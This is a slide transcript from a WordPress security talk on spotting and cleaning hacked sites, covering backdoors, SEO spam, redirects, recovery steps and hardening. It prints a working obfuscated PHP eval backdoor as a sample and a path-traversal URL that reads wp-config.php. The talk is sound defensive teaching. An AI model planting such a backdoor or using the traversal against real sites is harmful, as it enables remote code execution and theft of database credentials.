your wordpress site is and is not hacked - you don't know until you check
TRANSCRIPT
YOUR SITE IS AND IS NOT
HACKED @ASKWPGIRL #WCSLC
SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not hacked until you open the box and find out.
<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval(${$s20}['q53b3a6']);}?>
WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 — Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
WHAAA?
1
WHY DO HACKERS HACK?Deface sites for fun
Add spammy links to bad web neighborhoods (SEO spam)
Hijack site to add spam, porn, gambling, pay-day loans content
Steal sensitive information to sell
Distribute malware to personal computers
Use server resources for distributed attacks
WHAT DO HACKERS ACTUALLY DO?
Create admin account
Reset passwords
Inject malicious code into content
Add malicious code to existing files or new files
Redirect your website
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
Gravity Forms hack
WHY SHOULD YOU CARE?
Performance issues
SEO tanks
Blacklisting or Phish Tank
Account closed
Angry customers
TYPICALLY, ONLY THE MOST SEVERELY HACKED
SITES WILL BE BLACKLISTED OR
SUSPENDED BY HOST Many hacks are hidden
WHY ARE WORDPRESS SITES VULNERABLE?
29%
8%
22%
41%41% Hosting
22% Plugins
29% Themes
8% Weak Passwords
RECENT VULNERABILITIES
Google Analytics WordPress 4.2.1
Backup to Dropbox FancyBox
TwentyFifteen
Revolution SliderGravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don’t update, use weak passwords, install tons of plugins, use not-great web hosting
COMMON EXPLOITS AND
HOW TO FIX
2
“SPOT THE HACK” GAME
A - Scan Site
B - Look at files on server
C - Find the hacked code
A B
C
1 - Backdoors PHP files uploaded to your server and accessed remotely. Severely affect site and server performance. Not easy to find.
IT'S VERY COMMON, THAT BACKDOORS DON'T HAVE ANY VISIBLE SIGNS IN THE
SITE CODE AND IT'S IMPOSSIBLE TO DETECT
THEM BY ACCESSING THE INFECTED SITE FROM OUTSIDE. ~ SUCURI
2 - Drive by Downloads Script injected on website generates links to malware sites or downloads malware from your site to visitors’ computers. Easy for scanners to detect.
3 - Pharma Hack Spam links injected onto web pages only visible to search engines. Difficult to scan for because cloaked.
https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
4 - Malicious Redirects Redirects traffic from your website to another typically by modifying the .htaccess file, sometimes only when viewed by a particular device or browser, like a phone
Hacked .htaccess file
DIY HACK RECOVERYVia SFTP (preferred) or FTP
1 Backup:
Download everything. Good to
examine later for details of hack if
needed.
2 Delete all except:
cgi-bin.htaccess
wp-config.php(examine these)
3 Upload fresh:
WordPressThemesPlugins
cleaned uploads
Why are people from Thailand and Romania accessing a strangely named PHP file somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
MONITORING TIPS
Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
Check WordPress core integrity using Sucuri plugin https://wordpress.org/plugins/sucuri-scanner/
Run https://wordpress.org/plugins/gotmls/ to check wp-content folder
Look for modified dates, unusual names, file types that don’t belong
Compare file list to original download
Commonly hacked files: .htaccess, wp-config.php, index.php, functions.php, header.php
Any file can be hacked!
Finding PHP Back Doors
Hmmmm? PHP in a CSS folder?
Finding and Removing Malicious Redirects
Listen to when someone tells you that they tried to visit your site and couldn’t and find out which browser or device they were using at the time.
Use http://www.botsvsbrowsers.com/SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck
Check all the .htaccess files on the server and remove the redirect.
https://sitecheck.sucuri.net/
Use Google Search Console!
Google Webmaster Tools/Search Console Search Queries – you can spot queries irrelevant to you site.Links to Your Site – you can find suspicious incoming links here.Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
IMMEDIATELY CHANGE PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress users, FTP, web hosting, control panel
Scan computer for viruses!
See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK If hackers got admin access to site or database,
you might have to nuke the entire site from orbit — it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact sucuri.net for
site clean up and monitoring
REQUEST SITE REVIEWIf Google blacklisted your site or marked it for phishing scam, you will need to request a review after you are
certain you’ve cleaned up all hacked files:
https://support.google.com/webmasters/answer/168328?hl=en
SECURITY BASICS
3
UPDATE UPDATE UPDATE
Timely updates are critical for security. Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
SECURE YOUR LOGINOnline Generator:
http://www.pctools.com/guides/password/
Track Passwords: http://agilebits.com/products/1Password
Enable Two-Factor Authentication:http://askwpgirl.com/wordpress-two-factor-
authentication-plugins/
Avoid logging in on public WiFi Networks
RUN A TIGHT SHIP!Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam filtering (Akismet plugin)
GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress Hosts:Site GroundWP Engine
Get FlywheelWeb Synthesis
Pantheon
EFFECTIVE SECURITY PLUGIN FEATURES
Limit login access
Block bad URL requests with a Firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the foundation of a WordPress security policy
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/Does all the above and more. Will notify you of vulnerable plugins.
mywebsite.com/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
BACKUPSCommon wisdom is to backup your site
Backups are to your site what major medical health care coverage is to your health
Usually only helpful in case of a disaster
Services:VaultPress and
WorpDrive good hosted solutions!
Plugins:BackupBuddy (paid),
BackWPUp,Duplicator
SECURE YOUR COMPUTERScan for viruses and trojans
Be careful about downloading stuff!!!!
RESOURCEShttp://snipe.net/2010/01/when-wordpress-gets-hacked/
https://support.google.com/webmasters/answer/163633?rd=1 ***
http://aw-snap.info/articles/find-backdoor.php
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://sucuri.net - free scan, hack recovering, site monitoring, great posts on how to clean up specific hacks
http://aswkpgirl.com/nuke-it-from-orbit
https://www.icontrolwp.com/2014/05/wordpress-security-simple-firewall-plugin-part-4-login-protection-feature/
https://www.icontrolwp.com/2014/06/beware-new-security-theat-wordpress-misinformation-virus/
About the banking hack: https://www.proofpoint.com/es/node/327
Top 10 Web application security risks for developers: https://youtu.be/nuWR_HiBHYc
http://www.smashingmagazine.com/2012/10/four-malware-infections-wordpress/
CONTACTfacebook.com/askwpgirl
twitter.com/askwpgirl
http://askwpgirl.com
http://boulderdigitalarts.com
One-on-One consulting third Friday of every month at Boulder Digital Arts
Six-week theme customization course in Colorado and online.
SEO and Best Maintenance Tips Newsletter http://askwpgirl.com